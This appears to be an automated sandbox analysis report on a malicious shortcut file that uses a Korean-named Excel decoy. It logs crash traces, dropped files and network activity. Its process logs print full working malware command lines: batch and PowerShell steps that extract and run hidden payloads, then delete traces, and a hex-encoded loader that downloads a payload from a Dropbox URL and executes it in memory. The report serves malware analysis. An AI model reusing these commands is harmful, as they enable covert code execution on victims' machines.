mso+0xb6de4 @ 0x6d506de4 _MsoPeekMessage@8+0x446e _MsoGetStringTypeExW@20-0x1bc9 mso+0xb6d1b @ 0x6d506d1b _MsoPeekMessage@8+0x16ad _MsoGetStringTypeExW@20-0x498a mso+0xb3f5a @ 0x6d503f5a _MsoPeekMessage@8+0x2294 _MsoGetStringTypeExW@20-0x3da3 mso+0xb4b41 @ 0x6d504b41 _MsoPeekMessage@8+0x1196 _MsoGetStringTypeExW@20-0x4ea1 mso+0xb3a43 @ 0x6d503a43 MdCallBack-0x9c7613 excel+0x2651a @ 0x2f0b651a MdCallBack-0x9c9bd0 excel+0x23f5d @ 0x2f0b3f5d MdCallBack-0x9e98e2 excel+0x424b @ 0x2f09424b MdCallBack-0x9e9c23 excel+0x3f0a @ 0x2f093f0a BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x74e833ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x774a9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x774a9ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0xc004f011 exception.offset: 46887 exception.address: 0x7588b727 registers.esp: 4450704 registers.edi: 4450868 registers.eax: 4450704 registers.ebp: 4450784 registers.edx: 0 registers.ebx: 4451920 registers.esi: 3221549073 registers.ecx: 2147483648	1	0	0

Application Crash

Process EXCEL.EXE with pid 1624 crashed

Time & API

Arguments

Status

Return

Repeated

__exception__

Oct. 30, 2023, 5:46 p.m.

stacktrace:

RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x750b374b
NdrAllocate+0x5c8 RpcBindingFromStringBindingA-0xca4 rpcrt4+0x42b08 @ 0x750d2b08
NdrGetBuffer+0xf4 NdrSendReceive-0x6 rpcrt4+0x1801a @ 0x750a801a
SLClose-0x28e osppc+0x33cf @ 0x6d0133cf
SLLoadApplicationPolicies+0xa99 SLCallServer-0x330 osppc+0x15dba @ 0x6d025dba
SLClose+0x4c4 SLpBeginGenuineTicketTransaction-0x4f79 osppc+0x3b21 @ 0x6d013b21
SLpVLActivateProduct+0xcb SLpGetMSPidInformation-0x111 osppc+0x12074 @ 0x6d022074
SLActivateProduct+0x48e SLInitialize-0x110a osppcext+0x385c7 @ 0x657885c7
??0OdfStgParams@@QAE@XZ+0xbae22 mso+0xfbdd28 @ 0x6e40dd28
DllGetLCID+0x5c042 _MsoWebServerSupportEx@12-0x1c8a2b mso+0x6bc415 @ 0x6db0c415
_MsoFGetTooltips@0+0x8918 _MsoHrSimpleQueryInterface@16-0x1221a mso+0xc90c4 @ 0x6d5190c4
_MsoFGetTooltips@0+0x88ca _MsoHrSimpleQueryInterface@16-0x12268 mso+0xc9076 @ 0x6d519076
_MsoPeekMessage@8+0x49a0 _MsoGetStringTypeExW@20-0x1697 mso+0xb724d @ 0x6d50724d
_MsoCpgFromChs@4+0x14e3 _MsoCrCbvGet@4-0xa6c mso+0x30f14 @ 0x6d480f14
_MsoGetHmodPTLServices@0+0x4883 _MsoCpgFromChs@4-0x1e10 mso+0x2dc21 @ 0x6d47dc21
_MsoGetHmodPTLServices@0+0x45f3 _MsoCpgFromChs@4-0x20a0 mso+0x2d991 @ 0x6d47d991
_MsoGetHmodPTLServices@0+0x326f _MsoCpgFromChs@4-0x3424 mso+0x2c60d @ 0x6d47c60d
_MsoFCreateIPref@28+0x143f _MsoFUseIEFeature@8-0xee0 mso+0x22ce6 @ 0x6d472ce6
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x74e833ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x774a9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x774a9ea5

__exception__

Oct. 30, 2023, 5:46 p.m.

stacktrace:

RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x750b374b
NdrAllocate+0x5c8 RpcBindingFromStringBindingA-0xca4 rpcrt4+0x42b08 @ 0x750d2b08
NdrGetBuffer+0xf4 NdrSendReceive-0x6 rpcrt4+0x1801a @ 0x750a801a
SLClose-0x28e osppc+0x33cf @ 0x6d0133cf
SLLoadApplicationPolicies+0xa99 SLCallServer-0x330 osppc+0x15dba @ 0x6d025dba
SLClose+0x4c4 SLpBeginGenuineTicketTransaction-0x4f79 osppc+0x3b21 @ 0x6d013b21
SLpGetTokenActivationGrantInfo+0x13c SLpGenerateTokenActivationChallenge-0x11c osppc+0x13102 @ 0x6d023102
SLGetTokenActivationGrants+0x710 SLGetTokenActivationCertificates-0x7a8 osppcext+0x5f7d0 @ 0x657af7d0
??0OdfStgParams@@QAE@XZ+0xbb1e7 mso+0xfbe0ed @ 0x6e40e0ed
??0OdfStgParams@@QAE@XZ+0xbb3c9 mso+0xfbe2cf @ 0x6e40e2cf
DllGetClassObject+0x3c2bb _MsoFActivateControl@4-0x25231 mso+0xa84871 @ 0x6ded4871
DllGetClassObject+0x3c339 _MsoFActivateControl@4-0x251b3 mso+0xa848ef @ 0x6ded48ef
_MsoFHideTaiwan@0+0x4ccf _MsoSetLVProperty@8-0x7e2a9 mso+0x274ea0 @ 0x6d6c4ea0
_MsoFDoSmartTagSecurityCheck@8+0xb6367 _MsoCompareStringA@24-0x391 mso+0x61d7ab @ 0x6da6d7ab
??0OdfStgParams@@QAE@XZ+0xed734 mso+0xff063a @ 0x6e44063a
DllGetLCID+0x5c144 _MsoWebServerSupportEx@12-0x1c8929 mso+0x6bc517 @ 0x6db0c517
_MsoFGetTooltips@0+0x8918 _MsoHrSimpleQueryInterface@16-0x1221a mso+0xc90c4 @ 0x6d5190c4
_MsoFGetTooltips@0+0x8844 _MsoHrSimpleQueryInterface@16-0x122ee mso+0xc8ff0 @ 0x6d518ff0
_MsoPeekMessage@8+0x49e5 _MsoGetStringTypeExW@20-0x1652 mso+0xb7292 @ 0x6d507292
_MsoPeekMessage@8+0x49a0 _MsoGetStringTypeExW@20-0x1697 mso+0xb724d @ 0x6d50724d
_MsoCpgFromChs@4+0x14e3 _MsoCrCbvGet@4-0xa6c mso+0x30f14 @ 0x6d480f14
_MsoGetHmodPTLServices@0+0x4883 _MsoCpgFromChs@4-0x1e10 mso+0x2dc21 @ 0x6d47dc21
_MsoGetHmodPTLServices@0+0x45f3 _MsoCpgFromChs@4-0x20a0 mso+0x2d991 @ 0x6d47d991
_MsoPeekMessage@8+0x4537 _MsoGetStringTypeExW@20-0x1b00 mso+0xb6de4 @ 0x6d506de4
_MsoPeekMessage@8+0x446e _MsoGetStringTypeExW@20-0x1bc9 mso+0xb6d1b @ 0x6d506d1b
_MsoPeekMessage@8+0x16ad _MsoGetStringTypeExW@20-0x498a mso+0xb3f5a @ 0x6d503f5a
_MsoPeekMessage@8+0x2294 _MsoGetStringTypeExW@20-0x3da3 mso+0xb4b41 @ 0x6d504b41
_MsoPeekMessage@8+0x1196 _MsoGetStringTypeExW@20-0x4ea1 mso+0xb3a43 @ 0x6d503a43
MdCallBack-0x9c7613 excel+0x2651a @ 0x2f0b651a
MdCallBack-0x9c9bd0 excel+0x23f5d @ 0x2f0b3f5d
MdCallBack-0x9e98e2 excel+0x424b @ 0x2f09424b
MdCallBack-0x9e9c23 excel+0x3f0a @ 0x2f093f0a
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x74e833ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x774a9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x774a9ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0xc004f011
exception.offset: 46887
exception.address: 0x7588b727
registers.esp: 4450704
registers.edi: 4450868
registers.eax: 4450704
registers.ebp: 4450784
registers.edx: 0
registers.ebx: 4451920
registers.esi: 3221549073
registers.ecx: 2147483648

Creates (office) documents on the filesystem (2 events)

file	C:\Users\test22\AppData\Local\Temp\~$주요도시 시장가격 조사2023.xlsx
file	C:\Users\test22\AppData\Local\Temp\주요도시 시장가격 조사2023.xlsx

Creates executable files on the filesystem (6 events)

file	c:\Users\test22\AppData\Local\Temp\qceyv3jp.dll
file	c:\Users\test22\AppData\Local\Temp\xj4njtpx.dll
file	C:\Users\Public\281023.bat
file	c:\Users\test22\AppData\Local\Temp\sbjraxxu.dll
file	c:\Users\test22\AppData\Local\Temp\qwrnexiw.dll
file	C:\Users\Public\282310.bat

Creates hidden or system file (1 event)

Time & API	Arguments	Status	Return	Repeated
NtCreateFile Oct. 30, 2023, 5:46 p.m.	create_disposition: 2 (FILE_CREATE) file_handle: 0x00000444 filepath: C:\Users\test22\AppData\Local\Temp\~$주요도시 시장가격 조사2023.xlsx desired_access: 0xc0110080 (FILE_READ_ATTRIBUTES\|DELETE\|SYNCHRONIZE\|GENERIC_WRITE) file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN) filepath_r: \??\C:\Users\test22\AppData\Local\Temp\~$주요도시 시장가격 조사2023.xlsx create_options: 4198496 (FILE_NON_DIRECTORY_FILE\|FILE_SYNCHRONOUS_IO_NONALERT\|FILE_DELETE_ON_CLOSE) status_info: 2 (FILE_CREATED) share_access: 1 (FILE_SHARE_READ)	1	0	0

Creates a shortcut to an executable file (2 events)

file	C:\Users\test22\AppData\Local\Temp\주요도시 시장가격 조사2023.lnk
file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (6 events)

cmdline	"C:\Windows\SysWOW64\cmd.exe" /k echo SET a=power>C:\Users\Public\282310.bat&&echo SET b=shell.exe>>C:\Users\Public\282310.bat&&echo SET M=%a%%b%>>C:\Users\Public\282310.bat&&echo call %M% -windowstyle hidden "$dirPath=Get-Location;if($dirPath -Match 'System32' -or $dirPath -Match 'Program Files') {$dirPath = 'C:\Users\test22\AppData\Local\Temp'}; $lnkPath=Get-ChildItem -Path $dirPath -Recurse *.lnk \| where-object {$_.length -eq 0x032A1EB6} \| Select-Object -ExpandProperty FullName; $lnkFile=New-Object System.IO.FileStream($lnkPath, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read);$lnkFile.Seek(0x00001304, [System.IO.SeekOrigin]::Begin);$pdfFile=New-Object byte[] 0x00008DA6;$lnkFile.Read($pdfFile, 0, 0x00008DA6);$PdfPath = $lnkPath.Replace('.lnk','.xlsx');sc $PdfPath $pdfFile -Encoding Byte;& $PdfPath;$lnkFile.Seek(0x0000A0AA,[System.IO.SeekOrigin]::Begin);$exeFile=New-Object byte[] 0x00000D18;$lnkFile.Read($exeFile, 0, 0x00000D18);$exePath=$env:public+'\'+'281023.bat';sc $exePath $exeFile -Encoding Byte;& $exePath;remove-item -path $exePath -force;$lnkFile.Close();remove-item -path $lnkPath -force;">>C:\Users\Public\282310.bat&& start /min C:\Users\Public\282310.bat&&exit
cmdline	C:\Windows\system32\cmd.exe /c dir C:\Windows\SysWow64\WindowsPowerShell\v1.0\*rshell.exe /s /b /od
cmdline	C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden -command "$red ="$yellow="""5B4E65742E53657276696365506F696E744D616E616765725D3A3A536563757269747950726F746F636F6C3D5B456E756D5D3A3A546F4F626A656374285B4E65742E536563757269747950726F746F636F6C547970655D2C2033303732293B2461613D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E7450747220476C6F62616C416C6C6F632875696E7420622C75696E742063293B273B24623D4164642D54797065202D4D656D626572446566696E6974696F6E20246161202D4E616D6520224141412220202D50617373546872753B2461626162203D20275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20626F6F6C205669727475616C50726F7465637428496E7450747220612C75696E7420622C75696E7420632C6F757420496E745074722064293B273B246161623D4164642D54797065202D4D656D626572446566696E6974696F6E202461626162202D4E616D65202241414222202D50617373546872753B2463203D204E65772D4F626A6563742053797374656D2E4E65742E576562436C69656E743B24643D2268747470733A2F2F646C2E64726F70626F7875736572636F6E74656E742E636F6D2F73636C2F66692F68377035616561726B627136726E62326F683633332F32303233313032385F73656C63612E7A69703F726C6B65793D38676D6E6E6672657A7A32766E6E64737231637A373831637626646C3D30223B2462623D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E745074722043726561746554687265616428496E7450747220612C75696E7420622C496E7450747220632C496E7450747220642C75696E7420652C496E745074722066293B273B246363633D4164642D54797065202D4D656D626572446566696E6974696F6E20246262202D4E616D65202242424222202D50617373546872753B246464643D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E745074722057616974466F7253696E676C654F626A65637428496E7450747220612C75696E742062293B273B246666663D4164642D54797065202D4D656D626572446566696E6974696F6E2024646464202D4E616D65202244444422202D50617373546872753B24653D3131323B646F207B2020747279207B2024632E486561646572735B22757365722D6167656E74225D203D2022636F6E6E6E656374696E672E2E2E223B24786D7077343D24632E446F776E6C6F616444617461282464293B247830203D2024623A3A476C6F62616C416C6C6F63283078303034302C2024786D7077342E4C656E6774682B3078313030293B246F6C64203D20303B246161623A3A5669727475616C50726F74656374282478302C2024786D7077342E4C656E6774682B30783130302C20307834302C205B7265665D246F6C64293B666F7220282468203D20313B2468202D6C742024786D7077342E4C656E6774683B24682B2B29207B5B53797374656D2E52756E74696D652E496E7465726F7053657276696365732E4D61727368616C5D3A3A577269746542797465282478302C2024682D312C202824786D7077345B24685D202D62786F722024786D7077345B305D2920293B7D3B7472797B7468726F7720313B7D63617463687B2468616E646C653D246363633A3A43726561746554687265616428302C302C2478302C302C302C30293B246666663A3A57616974466F7253696E676C654F626A656374282468616E646C652C203530302A31303030293B7D3B24653D3232323B7D63617463687B736C6565702031313B24653D3131323B7D7D7768696C65282465202D657120313132293B""";$chemble="""""";for($i=0;$i -le $yellow.Length-2;$i=$i+2){$MMOMM=$yellow[$i]+$yellow[$i+1];$chemble= $chemble+[char]([convert]::toint16($MMOMM,16));};Invoke-Command -ScriptBlock ([Scriptblock]::Create($chemble));";Invoke-Command -ScriptBlock ([Scriptblock]::Create($red));while(true){}"
cmdline	c:\\Windows\\SysWOW64\\cmd.exe /c for /f "tokens=" %a in ('dir C:\Windows\SysWow64\WindowsPowerShell\v1.0\rshell.exe /s /b /od') do call %a -windowstyle hidden -command "$red ="$yellow="""5B4E65742E53657276696365506F696E744D616E616765725D3A3A536563757269747950726F746F636F6C3D5B456E756D5D3A3A546F4F626A656374285B4E65742E536563757269747950726F746F636F6C547970655D2C2033303732293B2461613D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E7450747220476C6F62616C416C6C6F632875696E7420622C75696E742063293B273B24623D4164642D54797065202D4D656D626572446566696E6974696F6E20246161202D4E616D6520224141412220202D50617373546872753B2461626162203D20275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20626F6F6C205669727475616C50726F7465637428496E7450747220612C75696E7420622C75696E7420632C6F757420496E745074722064293B273B246161623D4164642D54797065202D4D656D626572446566696E6974696F6E202461626162202D4E616D65202241414222202D50617373546872753B2463203D204E65772D4F626A6563742053797374656D2E4E65742E576562436C69656E743B24643D2268747470733A2F2F646C2E64726F70626F7875736572636F6E74656E742E636F6D2F73636C2F66692F68377035616561726B627136726E62326F683633332F32303233313032385F73656C63612E7A69703F726C6B65793D38676D6E6E6672657A7A32766E6E64737231637A373831637626646C3D30223B2462623D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E745074722043726561746554687265616428496E7450747220612C75696E7420622C496E7450747220632C496E7450747220642C75696E7420652C496E745074722066293B273B246363633D4164642D54797065202D4D656D626572446566696E6974696F6E20246262202D4E616D65202242424222202D50617373546872753B246464643D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E745074722057616974466F7253696E676C654F626A65637428496E7450747220612C75696E742062293B273B246666663D4164642D54797065202D4D656D626572446566696E6974696F6E2024646464202D4E616D65202244444422202D50617373546872753B24653D3131323B646F207B2020747279207B2024632E486561646572735B22757365722D6167656E74225D203D2022636F6E6E6E656374696E672E2E2E223B24786D7077343D24632E446F776E6C6F616444617461282464293B247830203D2024623A3A476C6F62616C416C6C6F63283078303034302C2024786D7077342E4C656E6774682B3078313030293B246F6C64203D20303B246161623A3A5669727475616C50726F74656374282478302C2024786D7077342E4C656E6774682B30783130302C20307834302C205B7265665D246F6C64293B666F7220282468203D20313B2468202D6C742024786D7077342E4C656E6774683B24682B2B29207B5B53797374656D2E52756E74696D652E496E7465726F7053657276696365732E4D61727368616C5D3A3A577269746542797465282478302C2024682D312C202824786D7077345B24685D202D62786F722024786D7077345B305D2920293B7D3B7472797B7468726F7720313B7D63617463687B2468616E646C653D246363633A3A43726561746554687265616428302C302C2478302C302C302C30293B246666663A3A57616974466F7253696E676C654F626A656374282468616E646C652C203530302A31303030293B7D3B24653D3232323B7D63617463687B736C6565702031313B24653D3131323B7D7D7768696C65282465202D657120313132293B""";$chemble="""""";for($i=0;$i -le $yellow.Length-2;$i=$i+2){$MMOMM=$yellow[$i]+$yellow[$i+1];$chemble= $chemble+[char]([convert]::toint16($MMOMM,16));};Invoke-Command -ScriptBlock ([Scriptblock]::Create($chemble));";Invoke-Command -ScriptBlock ([Scriptblock]::Create($red));while(true){}"
cmdline	C:\Windows\system32\cmd.exe /K C:\Users\Public\282310.bat
cmdline	powershell.exe -windowstyle hidden "$dirPath=Get-Location;if($dirPath -Match 'System32' -or $dirPath -Match 'Program Files') {$dirPath = 'C:\Users\test22\AppData\Local\Temp'}; $lnkPath=Get-ChildItem -Path $dirPath -Recurse *.lnk \| where-object {$_.length -eq 0x032A1EB6} \| Select-Object -ExpandProperty FullName; $lnkFile=New-Object System.IO.FileStream($lnkPath, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read);$lnkFile.Seek(0x00001304, [System.IO.SeekOrigin]::Begin);$pdfFile=New-Object byte[] 0x00008DA6;$lnkFile.Read($pdfFile, 0, 0x00008DA6);$PdfPath = $lnkPath.Replace('.lnk','.xlsx');sc $PdfPath $pdfFile -Encoding Byte;& $PdfPath;$lnkFile.Seek(0x0000A0AA,[System.IO.SeekOrigin]::Begin);$exeFile=New-Object byte[] 0x00000D18;$lnkFile.Read($exeFile, 0, 0x00000D18);$exePath=$env:public+'\'+'281023.bat';sc $exePath $exeFile -Encoding Byte;& $exePath;remove-item -path $exePath -force;$lnkFile.Close();remove-item -path $lnkPath -force;"

Looks up the Dropbox cloud service (1 event)

domain

dl.dropboxusercontent.com

Drops an executable to the user AppData folder (4 events)

file	C:\Users\test22\AppData\Local\Temp\qwrnexiw.dll
file	C:\Users\test22\AppData\Local\Temp\sbjraxxu.dll
file	C:\Users\test22\AppData\Local\Temp\xj4njtpx.dll
file	C:\Users\test22\AppData\Local\Temp\qceyv3jp.dll

A process created a hidden window (3 events)

Time & API	Arguments	Status	Return
CreateProcessInternalW Oct. 30, 2023, 5:45 p.m.	thread_identifier: 2404 thread_handle: 0x00000088 process_identifier: 2408 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe track: 1 command_line: powershell.exe -windowstyle hidden "$dirPath=Get-Location;if($dirPath -Match 'System32' -or $dirPath -Match 'Program Files') {$dirPath = 'C:\Users\test22\AppData\Local\Temp'}; $lnkPath=Get-ChildItem -Path $dirPath -Recurse *.lnk \| where-object {$_.length -eq 0x032A1EB6} \| Select-Object -ExpandProperty FullName; $lnkFile=New-Object System.IO.FileStream($lnkPath, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read);$lnkFile.Seek(0x00001304, [System.IO.SeekOrigin]::Begin);$pdfFile=New-Object byte[] 0x00008DA6;$lnkFile.Read($pdfFile, 0, 0x00008DA6);$PdfPath = $lnkPath.Replace('.lnk','.xlsx');sc $PdfPath $pdfFile -Encoding Byte;& $PdfPath;$lnkFile.Seek(0x0000A0AA,[System.IO.SeekOrigin]::Begin);$exeFile=New-Object byte[] 0x00000D18;$lnkFile.Read($exeFile, 0, 0x00000D18);$exePath=$env:public+'\'+'281023.bat';sc $exePath $exeFile -Encoding Byte;& $exePath;remove-item -path $exePath -force;$lnkFile.Close();remove-item -path $lnkPath -force;" filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000084	1	1
CreateProcessInternalW Oct. 30, 2023, 5:46 p.m.	thread_identifier: 1680 thread_handle: 0x00000088 process_identifier: 1472 current_directory: filepath: c:\Windows\SysWOW64\cmd.exe track: 1 command_line: c:\\Windows\\SysWOW64\\cmd.exe /c for /f "tokens=" %a in ('dir C:\Windows\SysWow64\WindowsPowerShell\v1.0\rshell.exe /s /b /od') do call %a -windowstyle hidden -command "$red ="$yellow="""5B4E65742E53657276696365506F696E744D616E616765725D3A3A536563757269747950726F746F636F6C3D5B456E756D5D3A3A546F4F626A656374285B4E65742E536563757269747950726F746F636F6C547970655D2C2033303732293B2461613D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E7450747220476C6F62616C416C6C6F632875696E7420622C75696E742063293B273B24623D4164642D54797065202D4D656D626572446566696E6974696F6E20246161202D4E616D6520224141412220202D50617373546872753B2461626162203D20275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20626F6F6C205669727475616C50726F7465637428496E7450747220612C75696E7420622C75696E7420632C6F757420496E745074722064293B273B246161623D4164642D54797065202D4D656D626572446566696E6974696F6E202461626162202D4E616D65202241414222202D50617373546872753B2463203D204E65772D4F626A6563742053797374656D2E4E65742E576562436C69656E743B24643D2268747470733A2F2F646C2E64726F70626F7875736572636F6E74656E742E636F6D2F73636C2F66692F68377035616561726B627136726E62326F683633332F32303233313032385F73656C63612E7A69703F726C6B65793D38676D6E6E6672657A7A32766E6E64737231637A373831637626646C3D30223B2462623D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E745074722043726561746554687265616428496E7450747220612C75696E7420622C496E7450747220632C496E7450747220642C75696E7420652C496E745074722066293B273B246363633D4164642D54797065202D4D656D626572446566696E6974696F6E20246262202D4E616D65202242424222202D50617373546872753B246464643D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E745074722057616974466F7253696E676C654F626A65637428496E7450747220612C75696E742062293B273B246666663D4164642D54797065202D4D656D626572446566696E6974696F6E2024646464202D4E616D65202244444422202D50617373546872753B24653D3131323B646F207B2020747279207B2024632E486561646572735B22757365722D6167656E74225D203D2022636F6E6E6E656374696E672E2E2E223B24786D7077343D24632E446F776E6C6F616444617461282464293B247830203D2024623A3A476C6F62616C416C6C6F63283078303034302C2024786D7077342E4C656E6774682B3078313030293B246F6C64203D20303B246161623A3A5669727475616C50726F74656374282478302C2024786D7077342E4C656E6774682B30783130302C20307834302C205B7265665D246F6C64293B666F7220282468203D20313B2468202D6C742024786D7077342E4C656E6774683B24682B2B29207B5B53797374656D2E52756E74696D652E496E7465726F7053657276696365732E4D61727368616C5D3A3A577269746542797465282478302C2024682D312C202824786D7077345B24685D202D62786F722024786D7077345B305D2920293B7D3B7472797B7468726F7720313B7D63617463687B2468616E646C653D246363633A3A43726561746554687265616428302C302C2478302C302C302C30293B246666663A3A57616974466F7253696E676C654F626A656374282468616E646C652C203530302A31303030293B7D3B24653D3232323B7D63617463687B736C6565702031313B24653D3131323B7D7D7768696C65282465202D657120313132293B""";$chemble="""""";for($i=0;$i -le $yellow.Length-2;$i=$i+2){$MMOMM=$yellow[$i]+$yellow[$i+1];$chemble= $chemble+[char]([convert]::toint16($MMOMM,16));};Invoke-Command -ScriptBlock ([Scriptblock]::Create($chemble));";Invoke-Command -ScriptBlock ([Scriptblock]::Create($red));while(true){}" filepath_r: c:\Windows\SysWOW64\cmd.exe stack_pivoted: 0 creation_flags: 525328 (CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000084	1	1
CreateProcessInternalW Oct. 30, 2023, 5:46 p.m.	thread_identifier: 1600 thread_handle: 0x00000094 process_identifier: 1300 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe track: 1 command_line: C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden -command "$red ="$yellow="""5B4E65742E53657276696365506F696E744D616E616765725D3A3A536563757269747950726F746F636F6C3D5B456E756D5D3A3A546F4F626A656374285B4E65742E536563757269747950726F746F636F6C547970655D2C2033303732293B2461613D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E7450747220476C6F62616C416C6C6F632875696E7420622C75696E742063293B273B24623D4164642D54797065202D4D656D626572446566696E6974696F6E20246161202D4E616D6520224141412220202D50617373546872753B2461626162203D20275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20626F6F6C205669727475616C50726F7465637428496E7450747220612C75696E7420622C75696E7420632C6F757420496E745074722064293B273B246161623D4164642D54797065202D4D656D626572446566696E6974696F6E202461626162202D4E616D65202241414222202D50617373546872753B2463203D204E65772D4F626A6563742053797374656D2E4E65742E576562436C69656E743B24643D2268747470733A2F2F646C2E64726F70626F7875736572636F6E74656E742E636F6D2F73636C2F66692F68377035616561726B627136726E62326F683633332F32303233313032385F73656C63612E7A69703F726C6B65793D38676D6E6E6672657A7A32766E6E64737231637A373831637626646C3D30223B2462623D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E745074722043726561746554687265616428496E7450747220612C75696E7420622C496E7450747220632C496E7450747220642C75696E7420652C496E745074722066293B273B246363633D4164642D54797065202D4D656D626572446566696E6974696F6E20246262202D4E616D65202242424222202D50617373546872753B246464643D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E745074722057616974466F7253696E676C654F626A65637428496E7450747220612C75696E742062293B273B246666663D4164642D54797065202D4D656D626572446566696E6974696F6E2024646464202D4E616D65202244444422202D50617373546872753B24653D3131323B646F207B2020747279207B2024632E486561646572735B22757365722D6167656E74225D203D2022636F6E6E6E656374696E672E2E2E223B24786D7077343D24632E446F776E6C6F616444617461282464293B247830203D2024623A3A476C6F62616C416C6C6F63283078303034302C2024786D7077342E4C656E6774682B3078313030293B246F6C64203D20303B246161623A3A5669727475616C50726F74656374282478302C2024786D7077342E4C656E6774682B30783130302C20307834302C205B7265665D246F6C64293B666F7220282468203D20313B2468202D6C742024786D7077342E4C656E6774683B24682B2B29207B5B53797374656D2E52756E74696D652E496E7465726F7053657276696365732E4D61727368616C5D3A3A577269746542797465282478302C2024682D312C202824786D7077345B24685D202D62786F722024786D7077345B305D2920293B7D3B7472797B7468726F7720313B7D63617463687B2468616E646C653D246363633A3A43726561746554687265616428302C302C2478302C302C302C30293B246666663A3A57616974466F7253696E676C654F626A656374282468616E646C652C203530302A31303030293B7D3B24653D3232323B7D63617463687B736C6565702031313B24653D3131323B7D7D7768696C65282465202D657120313132293B""";$chemble="""""";for($i=0;$i -le $yellow.Length-2;$i=$i+2){$MMOMM=$yellow[$i]+$yellow[$i+1];$chemble= $chemble+[char]([convert]::toint16($MMOMM,16));};Invoke-Command -ScriptBlock ([Scriptblock]::Create($chemble));";Invoke-Command -ScriptBlock ([Scriptblock]::Create($red));while(true){}" filepath_r: C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000088	1	1

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses Oct. 30, 2023, 5:46 p.m.	flags: 15 family: 0		111	0

URL downloaded by powershell script (2 events)

Data received
Data received	F

Poweshell is sending data to a remote host (20 events)

Data sent	\|xe?mc?DêÒ1º&XFgè(hÁqgÅB+m¿õ/5 ÀÀÀ À 287ÿdl.dropboxusercontent.com
Data sent	\|xe?mc 81]¿W°¦nA³'§çÈx]®®F*·Ä÷/5 ÀÀÀ À 287ÿdl.dropboxusercontent.com
Data sent	\|xe?mn£Úÿ×Ëõ½¸ÀPnn~\4w¶2£%~/5 ÀÀÀ À 287ÿdl.dropboxusercontent.com
Data sent	\|xe?mnQ5Á~DÃ ù#Y;.à`Ü^óÀö/5 ÀÀÀ À 287ÿdl.dropboxusercontent.com
Data sent	\|xe?myðÛe1)ÆhØy9m©bOôï½&8/5 ÀÀÀ À 287ÿdl.dropboxusercontent.com
Data sent	\|xe?myßÂ5R©JtÄ2ÌàÅò7E"2DhÖz/5 ÀÀÀ À 287ÿdl.dropboxusercontent.com
